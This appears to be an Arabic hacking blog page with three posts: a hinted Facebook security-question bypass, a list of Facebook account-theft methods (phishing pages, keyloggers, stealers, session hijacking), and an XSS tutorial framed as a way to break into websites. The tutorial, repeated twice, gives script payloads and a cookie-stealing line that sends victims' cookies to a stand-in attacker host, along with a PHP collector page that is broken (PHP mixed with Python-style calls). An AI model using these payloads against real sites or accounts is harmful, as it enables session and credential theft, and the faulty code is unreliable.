تأكد انك كما تدين تدان فلا توجد ثغرة
المشاركات الشائعة
-
تأكد انك كما تدين تدان فلا توجد ثغرة
-
اليوم راح نتحدث عن بعض طرق الي تحدث في اخترقات فيس بوك طرق حديثة ا ختراق جهاز الضحية بعد جمع كم كافي من المعلومات ا و عن طريق تل... -
اقدم لكم كود تخطي سوؤال الامان للفيسبوك انا اقدمه لكم ومن يعرف استغلاله لا يوؤذي مسلم فله وزره ووزر من عمل به انا اعطبكم الكود لا احد يسئلن...
-
ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟ ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على م...
المشاركات الشائعة
-
تأكد انك كما تدين تدان فلا توجد ثغرة
-
اليوم راح نتحدث عن بعض طرق الي تحدث في اخترقات فيس بوك طرق حديثة ا ختراق جهاز الضحية بعد جمع كم كافي من المعلومات ا و عن طريق تل...
-
اقدم لكم كود تخطي سوؤال الامان للفيسبوك انا اقدمه لكم ومن يعرف استغلاله لا يوؤذي مسلم فله وزره ووزر من عمل به انا اعطبكم الكود لا احد يسئلن...
-
ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟ ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على م...
الخميس، 28 نوفمبر 2013
الأحد، 27 أكتوبر 2013
تخطي سوؤال الامان للفيسبوك
اقدم لكم كود تخطي سوؤال الامان للفيسبوك انا اقدمه لكم ومن يعرف استغلاله لا يوؤذي مسلم فله وزره ووزر من عمل به انا اعطبكم الكود لا احد يسئلني عن كيفية عمله وشكرا للتفهم
وهذا تلميح عن كيفية الاستغلال
عند وصولك الى مرحلة الاجابة على السوؤال السري اضغط على F12
وغير ما يجب تغييره في forum
http://
وهذا تلميح عن كيفية الاستغلال
عند وصولك الى مرحلة الاجابة على السوؤال السري اضغط على F12
وغير ما يجب تغييره في forum
http://
الأربعاء، 9 أكتوبر 2013
بعض طرق الي تحدث في اخترقات فيس بوك
اليوم راح نتحدث عن بعض طرق الي تحدث في اخترقات فيس بوك
طرق حديثة
اختراق جهاز الضحية بعد جمع كم كافي من المعلومات او عن طريق تلغيم البرامج كما يحصل في المنتديات, ملفات التجسس المعتمدة على برامج RAT وأيضا مشروع الميتا سوبليت والبوت نت والثغرات فى السيرفرات الدعمه للأميلات كثغرة هوتميل الفترة الماضيه وأيضا الهندسه الأجتماعيه والفيروسات المتطورة و التخمين المتقدم والحقن واحتراق المواقع لسحب الأميلات والدخول للفيسبوك عبر الأميل والملفات المشبوه والبرمجيات الخبيثه واقراص التخزين الصلبة والمرنه مشبوهة المصدر ويكمن الحل الأمثل لجميع طرق الأختراق فى العقل الواعى القادر على تحليل ما يراه
طرق عامية
1 - الصفحة المزورة ( الاكثر شيوعاً في العالم العربي )
الصفحة المزورة هي من اكثر طرق الاختراق شيوعاً في اختراق الفيس بوك او الياهو في العالم العربي ، وببساطة هنا يقوم المخترق بانشاء صفحة تشبهه الفيس بوك وبها خانه لتسجيل الاميل والباسورد ويتم انشاءها علي رابط يشبهه الي حد كبير الفيس بوك ويتم ارسالها لك او لاي شخص ومعها عبارة مشوقة مثل "الالبوم الجديد للفنان ..." وغيرها من العبارات التي يتشوق لها الكثير فتقوم بالدخول بدون ان تنتبهه فتظهر لك هذه الصفحة وتطلب منك اعادة تسجيل الدخول الي الفيس بوك وهنا انت لا تنتبه ان هذا الرابط هو خارج الفيس بوك من الاساس وانه ليس رابط الفيس بوك وبمجرد ان تدخل البيانات يتم ارسالها للمخترق في شكل ملف تيكست ومن ثم يقوم المخترق بتحميلها وهكذا يصبح الحساب قد اخترق.
2 - keylogger
كي لوجر keylogger هو يعتبر اسهل الطرق لاختراق باسورد حساب الفيس بوك او لاختراق جهاز بالكامل بجميع الحسابات المسجلة عليه! ، لعلم هذا النوع حقاً في قمة الخطورة وحتي الحذر منه يعتبر صعب جداً وساشرح لك ، هذا النوع من البرامج صغير الحجم جداً ويقوم بالدخول الي جهاز الضحية وتسجيل كل ما يحدث به من باسوردات .. الخ ، وارسالها الي المخترق من خلال استضافة FTP ، او من خلال الايميل ، وهذا النوع خطر جداً لان مستخدم محترف للكمبيوتر يمكن ان يقع في مثل هذه الطرق.
3 - اختطاف الجلسة Session Hijacking
اختصاف الجلسة Session Hijacking قد يكون في قمة الخطورة لو كنت تتصفح الفيس بوك من خلال http ، ففي اختطاف الجلسة يقوم الهاكر بسرقة كوكز المتصفح والذي يستخدم في التحقق من الموقع الذي تقوم باستخدامه ويقوم بالدخول الي حسابك ، وهذه الطريقة تستخدم علي شبكة الـ Lan او الشبكة اللاسلكية ، ولكن لا تقلق لان هذه الطريقة لم تعد فعالة لان الفيس بوك اتاح استخدام Https وهو الوضع المشفر ، ويمكنك تفعيل التصفح الامن او Https من خلال صفحة اعدادات الحساب في الفيس بوك.
4 - Stealers
الكثير من المستخدمين او ربما جميعهم يقوم باستخدام خاصية حفظ الباسوردات داخل المتصفح سواء باسورد الفيس بوك او غيرها ، وهذا امر طبيعي ولكن في بعض الاحياب يمكن اختراقك من خلالها ، و Stealers هو عبارة عن برامج صممت خصيصاً لسحب هذه الباسوردات من المتصفح وارسالها الي المخترق.
5 - DNS Spoofing
ان كنت علي شبكة انترنت بمعني ان هناك اشخاص معك علي نفس الشبكة ، وكان من ضمنهم هاكر فيمكنه تغيير صفحة الفيس بوك لديك الاصلية الي صفحة المزورة التي تكلمنا عنها في الخطوة الاولي وبذلك يستطيع سرقة حسابك.
6 - تطبيقات الفيس بوك ( اصبحت خطيرة )
تطبيقات الفيس بوك اصبحت في الفترة الاخيرة من اخطر طرق الاختراق ، وهي عبارة عن تطبيق مشوق توم بالضغط عليه ويطلب السماح والاذن فتقوم انت بالسماح فيتحكم ف يحسابك ويرسل رسائل لاصدقائك ومنشورات علي الجروبات ! ، فانظر الصورة بالاسفل علي سبيل المثال :-
كما تلاحظ فـ هذا منشور داخل جروب من خلال التطبيق ، اذا قمت بالضغط عليه والسماح له فسوف يتم ارسال نفس المنشور علي جروباتك وصفحتك بدون اذنك وهكذا من يضغط عليه يقوم بنفس المهمة ! ، وهناك ما هو اخطر من هذا فاحذر من التطبيقات مجهولة المصدر. هناك تطبيقات تقوم بسرقة معلوماتك واخري بيانات حسابك .. الخ ، فاحذر !
ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
ما يجب ان تعرفه HTML,javascript,PHP
اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.infectedsite.com/search.php?q=word
يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
<script>alert("XSS")</script>
و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
أهمها سرقة الكوكيز
تحتاج الى استضافة موقع تدعم PHP
ننشئ صفحة PHP مثال stealer.php
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
الكود :
<?php
$data=$_GET["c"]
$f=open("cookies.tct","w")
$f.write($data)
$f.close()
?>
هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
هنا دمجنا السكريبت
<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
document.cookie
هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
ستجد الككيز للمستخدم مكتوبة فيها
اما في الثغرات الدائمة فيكفي ادخال الكود
<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
ليسرق الكوكيز
و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
عن طريق سكريبت
Document.location
ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
ما يجب ان تعرفه HTML,javascript,PHP
اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.infectedsite.com/search.php?q=word
يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
<script>alert("XSS")</script>
و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
أهمها سرقة الكوكيز
تحتاج الى استضافة موقع تدعم PHP
ننشئ صفحة PHP مثال stealer.php
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
الكود :
<?php
$data=$_GET["c"]
$f=open("cookies.tct","w")
$f.write($data)
$f.close()
?>
هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
هنا دمجنا السكريبت
<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
document.cookie
هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
ستجد الككيز للمستخدم مكتوبة فيها
اما في الثغرات الدائمة فيكفي ادخال الكود
<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
ليسرق الكوكيز
و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
عن طريق سكريبت
Document.location
الاشتراك في:
الرسائل (Atom)